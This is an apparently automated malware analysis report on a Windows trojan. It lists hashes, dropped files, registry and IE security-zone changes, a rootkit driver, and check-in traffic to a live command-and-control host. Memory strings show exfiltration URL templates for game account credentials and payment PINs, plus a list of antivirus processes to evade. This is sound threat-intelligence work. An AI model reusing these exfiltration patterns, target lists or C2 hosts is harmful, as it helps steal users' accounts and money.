HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Zusy.46800 (B) (Emsisoft), Gen:Variant.Zusy.46800 (AdAware), GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 4f1aed7bbbe43e65cf416fdedb00ecff
SHA1: b9e73c7f73e697932bc7cd2fa2eff0f133da39f9
SHA256: b7ab11bcccb084b0fd3fea86713fe576efe9d8e0e2e36ac266e0491aa48b0b33
SSDeep: 6144:FRkVBq2ypZBpupPAcYrV3eyZuU2i1mB1kCrN:HCBq2GXpuOt3eGrrY1
Size: 228352 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: AirInstaller
Created at: 2013-03-15 12:36:24
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
regsvr32.exe:816
%original file name%.exe:320
The Trojan injects its code into the following process(es):
svchost.exe:1152
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\ (4 bytes)
%System%\drivers\3a2ba1fa.sys (71 bytes)
%WinDir%\WinSxS (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Coor.bat (112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\giynhrYsD.dll (90 bytes)
%System%\wshtcpip.dll (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (400 bytes)
%WinDir%\AppPatch (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B1.zip (19 bytes)
%System%\config\SOFTWARE.LOG (11686 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A1.zip (19 bytes)
%WinDir%\REGISTRATION (4 bytes)
%WinDir% (492 bytes)
C:\$Directory (2360 bytes)
%System%\wshtcptk.dll (19 bytes)
%System% (4664 bytes)
%System%\midimap.dll (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dyeky.dll (90 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\C1.zip (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ZHHNK1RJ\desktop.ini (67 bytes)
%System%\drivers\4680947c.sys (32 bytes)
%WinDir%\WinSxS\Policies\x86_Policy.6.0.Microsoft.Windows.Common-Controls_6595b64144ccf1df_x-ww_5ddad775 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WHUF81E3\desktop.ini (67 bytes)
%System%\wbem (1064 bytes)
%System%\drivers (32 bytes)
%Documents and Settings%\All Users\Start Menu (4 bytes)
%System%\config\software (4303 bytes)
%System%\kakutk.dll (294 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G1U3S5Y7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\index.dat (16 bytes)
%System%\wbem\Repository\FS\INDEX.BTR (4624 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KQHFGPHV\desktop.ini (67 bytes)
%System%\wbem\Repository\FS\OBJECTS.DATA (10986 bytes)
The Trojan deletes the following file(s):
%System%\drivers\4680947c.sys (0 bytes)
Registry activity
The process regsvr32.exe:816 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\CLSID\{AB705622-B25B-491B-A6BF-4A46FDDBC88E}\VersionIndependentProgID]
"(Default)" = "IEHlprObj.IEHlprObj"
[HKCR\TypeLib\{AB705628-B25B-491B-A6BF-4A46FDDBC88E}\1.0\0\win32]
"(Default)" = "%System%\kakutk.dll"
[HKCR\Interface\{AB705621-B25B-491B-A6BF-4A46FDDBC88E}\TypeLib]
"(Default)" = "{AB705628-B25B-491B-A6BF-4A46FDDBC88E}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCR\TypeLib\{AB705628-B25B-491B-A6BF-4A46FDDBC88E}\1.0]
"(Default)" = "IEHelper 1.0 Type Library"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCR\IEHlprObj.IEHlprObj\CurVer]
"(Default)" = "IEHlprObj.IEHlprObj.1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCR\Interface\{AB705621-B25B-491B-A6BF-4A46FDDBC88E}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{AB705621-B25B-491B-A6BF-4A46FDDBC88E}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\TypeLib\{AB705628-B25B-491B-A6BF-4A46FDDBC88E}\1.0\FLAGS]
"(Default)" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\IEHlprObj.IEHlprObj.1]
"(Default)" = "IEHlprObj Class"
[HKCR\Interface\{AB705621-B25B-491B-A6BF-4A46FDDBC88E}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCR\CLSID\{AB705622-B25B-491B-A6BF-4A46FDDBC88E}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\Interface\{AB705621-B25B-491B-A6BF-4A46FDDBC88E}]
"(Default)" = "IIEHlprObj"
[HKCR\IEHlprObj.IEHlprObj]
"(Default)" = "IEHlprObj Class"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCR\IEHlprObj.IEHlprObj.1\CLSID]
"(Default)" = "{AB705622-B25B-491B-A6BF-4A46FDDBC88E}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "15 98 20 1B 1E E7 D1 34 F6 7E C6 18 68 C2 9A 84"
[HKCR\CLSID\{AB705622-B25B-491B-A6BF-4A46FDDBC88E}]
"(Default)" = "IEHlprObj Class"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCR\CLSID\{AB705622-B25B-491B-A6BF-4A46FDDBC88E}\InprocServer32]
"(Default)" = "%System%\kakutk.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCR\CLSID\{AB705622-B25B-491B-A6BF-4A46FDDBC88E}\ProgID]
"(Default)" = "IEHlprObj.IEHlprObj.1"
[HKCR\TypeLib\{AB705628-B25B-491B-A6BF-4A46FDDBC88E}\1.0\HELPDIR]
"(Default)" = "%System%\"
The process %original file name%.exe:320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\CLSID\HOOK_ID]
"Name" = "%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 20 93 85 03 9A 75 75 8A E3 0B E7 DE DC D1 D5"
[HKCR\CLSID\SYS_DLL]
"Name" = "giynhrYsD.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%System%\jdiguuwBsh, \??\%System%\jdiguuwBsh"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security zone settings so that all local web nodes with no dots that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
90affacb3c4f110ba63df2be93f2e41a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\A1.zip |
0b14dfd82a538cf8933435397dbc4925 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\B1.zip |
743cac2a53ba132d086853141246d7d7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\C1.zip |
5c12660a97822f6e61576943b49aaad6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\H7Ui28hui |
a581a82cb3267abb7543946ada12bcfa | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\dyeky.dll |
1f08a122535451e44926934069f39d2a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\giynhrYsD.dll |
883ef2dd3c9f68691ce02daac7267d41 | c:\Program Files\Java\jre6\bin\swe5i |
fd60844f7dc0cf7c7afa70b7ec6d0a7e | c:\Program Files\Java\jre6\lib\deploy\jqs\ie\7PhfhwYk |
565caee4622770caac3aa1213d6738cc | c:\WINDOWS\system32\drivers\3a2ba1fa.sys |
4e3d06d6e68eedb52565080f55b460d3 | c:\WINDOWS\system32\jdiguuwBsh |
28d9e9a9f8184972ce262a4d9fad6aac | c:\WINDOWS\system32\kakutk.dll |
4e3d06d6e68eedb52565080f55b460d3 | c:\WINDOWS\system32\wshtcptk.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
Using the driver "%System%\drivers\3a2ba1fa.sys", the Trojan controls the loading of executable images into memory by installing a load-image notify routine.
Propagation
Removals
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 806912 | 1536 | 0 | 033faf6d9fca77f29d3529b55e7abba8 |
.data | 811008 | 204800 | 201216 | 5.53196 | 4a79f1b149a5041886eaece7dd20e9be |
.rsrc | 1015808 | 8192 | 6144 | 0.378005 | 0445acc62bc38f6c01f643cc6b44dfe6 |
.reloc | 1024000 | 4096 | 1536 | 0.065844 | c158ec72e8b1f3d2ed53aff4d702d457 |
.idata | 1028096 | 20480 | 16896 | 3.2386 | 31347d4c9120a884a1f55d165cb539f2 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://198.105.210.188/get.asp?mac=D51B80D0FFCCD68BB0C633ADD668FF39&os=winxp Professional&avs=unknow&ps=NO.&ver=jack | |
hxxp://educaresurvivorship.com/get.asp?mac=D51B80D0FFCCD68BB0C633ADD668FF39&os=winxp Professional&avs=unknow&ps=NO.&ver=jack | |
hxxp://www.educaresurvivorship.com/get.asp?mac=D51B80D0FFCCD68BB0C633ADD668FF39&os=winxp Professional&avs=unknow&ps=NO.&ver=jack | 198.105.210.188 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /get.asp?mac=D51B80D0FFCCD68BB0C633ADD668FF39&os=winxp Professional&avs=unknow&ps=NO.&ver=jack HTTP/1.1
User-Agent: Google page
Connection: Keep-Alive
Cache-Control: no-cache
Host: VVV.educaresurvivorship.com
HTTP/1.1 404 Not Found
Date: Tue, 16 Dec 2014 05:40:31 GMT
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
X-Powered-By: PHP/5.4.25
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
4cd..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">.<head>.<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />.<title>EduCare Survivorship - Page Not Found</title>.<link href="/styles/styles.css" rel="stylesheet" type="text/css" />.</head>.<body>.<div id="container">..<div id="nav"> </div>..<img id="banner_img" src="/images/educares.jpg" usemap="#banner_img" border="0" width="990" height="416" alt="EduCare, Inc" />..<map id="_banner_img" name="banner_img">...<area shape="rect" coords="792,341,985,411" href="hXXp://VVV.educareinc.com" alt="EduCare, Inc" />..</map>..<div id="subnav">. . ..</div>..<div id="content"> ...<h1>Page Not Found</h1>...<p>We apologize for the inconvenience, but the requested page (VVV.educaresurvivorship.com/get.asp) was not found.</p>. <p><a href="/" title="Return Home">Return Home</a></p>..</div> ..<div id="footer-content"><a href="hXXp://EduCareInc.com" target="_blank">EduCareInc.com</a> ... 8420 ..
<<< skipped >>>
GET /get.asp?mac=D51B80D0FFCCD68BB0C633ADD668FF39&os=winxp Professional&avs=unknow&ps=NO.&ver=jack HTTP/1.1
User-Agent: Google page
Host: 198.105.210.188
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Date: Tue, 16 Dec 2014 05:40:30 GMT
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
X-Powered-By: PHP/5.4.25
Location: hXXp://VVV.educaresurvivorship.com/get.asp?mac=D51B80D0FFCCD68BB0C633ADD668FF39&os=winxp Professional&avs=unknow&ps=NO.&ver=jack
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
svchost.exe_1152_rwx_10001000_0003D000:
Lineage Windows Client
keimigfou@hotmail.com
%s?up=%s&pp=%s&spp=%s
Diablo III.exe
ws2_32.dll
ti.asp?up=%s&pp=%s
%s?ap=%s&sp=%s&up=%s&pp=%s&ssp=%s&spp=%s&rp=%s&lp=%d
X,
%s?ap=%s&sp=%s&up=%s&pp=%s&ssp=%s&spp=%s&rp=%s
DNF.cfg
\res\PCOTP.okf
kernel32.dll
dnf.exe
%sHShield\ehsvc.dll
pcotp.exe
%s?ap=%s&sp=%s&mp=%s&ssp=%s&spp=%s&rp=%s&up=%s&pp=%s
%s?ap=%s&sp=%s&mp=%s&ssp=%s&spp=%s&up=%s&pp=%s
%s?ap=%s&sp=%s&up=%s&pp=%s&ssp=%s&spp=%s
explorer.exe
%s?ap=%s&sp=%s&up=%s&pp=%s&lp=%s&spp=%s
maplestory.exe
%s?ap=%s&sp=%s&up=%s&pp=%s&ssp=%s&spp=%s&lp=%s&rp=%s&op=%s
ngm.exe
baramt.exe
winbaram.exe
ngmdll.dll
%s?ap=%s&sp=%s&up=%s&pp=%s&spp=%s&ssp=%s
0xx
8888888
%s?ap=%s&sp=%s&up=%s&pp=%s&ssp=%s
client.exe
msvcr90.dll
YGOnline.exe
cabal2main.exe
gameguard.des
%s-%s-%s-%s
%s-%s-%s-%s-%s
%s-%s-%s
ie ....Hwnd::::::::%x
Hwnd::::::::%x,class:%s
OLEACC.DLL
1111111%s:%s
gtc_pay_info%d
btc_pay_passwd
btc_pay_info%d
FunnyCard$txtFunnyCardNo%d
ftc_pay_info%d
Pyunweijum$txtPin%d
ptc_pay_info%d
TeenCash$txtPin%d
tc_pay_info%d
ctl00$ContentPlaceHolder1$PayInfoControl$GAMEGIFTControl$txt_gamegift_pin%d
GameCulture$txtPinNumber_%d
ctl00$ContentPlaceHolder1$PayInfoControl$GTCARDControl$txt_gtcard_pin%d
ctl00$ContentPlaceHolder1$PayInfoControl$BOOKLIFEControl$txt_booklife_pin%d
ctl00$ContentPlaceHolder1$PayInfoControl$TEENCASHControl$txt_teencash_pin%d
fifazf.exe
raycity.exe
launchern.exe
ModuMarble.exe
cstrike-online.exe
suddenattack.exe
KartRider.exe
%s?ap=%s&up=%s&pp=%s&ssp=%s
Mozilla/4.0 (compatible)
sos.exe
ykm.exe
~!@#$%^&*
heroes.exe
MYSFTY.EXE
CHROME.EXE
FIREFOX.EXE
NVCAGENT.NPC
NSVMON.NPC
NSAVSVC.NPC
V3SP.EXE
V3SVC.EXE
V3UP.EXE
V3LSVC.EXE
V3LRUN.EXE
V3LTRAY.EXE
MUPDATE2.EXE
SGSVC.EXE
SGUI.EXE
SGRUN.EXE
NAVERAGENT.EXE
AVP.EXE
AYRTSRV.AYE
AYUPDSRV.AYE
AYAGENT.AYE
AVGNT.EXE
AVCENTER.EXE
AVGUARD.EXE
AVSCAN.EXE
AVUPGSVC.EXE
AVWSC.EXE
AVASTSVC.EXE
ASHUPD.EXE
AVASTUI.EXE
SHSTAT.EXE
MCTRAY.EXE
UDATERUI.EXE
MSSECES.EXE
EGUI.EXE
EKRN.EXE
CCSVCHST.EXE
NAVW32.EXE
UPDATESRV.EXE
VSSERV.EXE
SECCENTER.EXE
BDAGENT.EXE
BDREINIT.EXE
AVGAM.EXE
AVGEMC.EXE
AVGNSX.EXE
AVGRSX.EXE
AVGFRW.EXE
AVGWDSVC.EXE
AVGUPD.EXE
bsier2.dat
bsiezq.dat
bsiejh.dat
bsiepk.dat
bsielq.dat
bsgdsos.dat
bsiegd.dat
bsiemxd.dat
bsiedk.dat
bsdfsos.dat
bsdfloc.dat
bsiednf.dat
bsiear.dat
bsieal.dat
V3LRun.exe
V3LTray.exe
iexplore.exe
EstRtw.sys
fltlib.dll
Mozilla/5.0 (compatible)
ntdll.dll
urlinfo
\\.\%s
Mozilla/6.0 (compatible)
\??\%s
Software\Microsoft\Windows\CurrentVersion\Run
r2client.exe
|9|3|1|1|0|
|9|1|1|1|0|
CMStarterCore.exe
archeage.exe
msvcr100.dll
x2game.dll
%s%s.dat
%s[%d]
lin.bin
mss32.dll
%s?ap=%s&sp=%s&up=%s&pp=%s&ssp=%s&rp=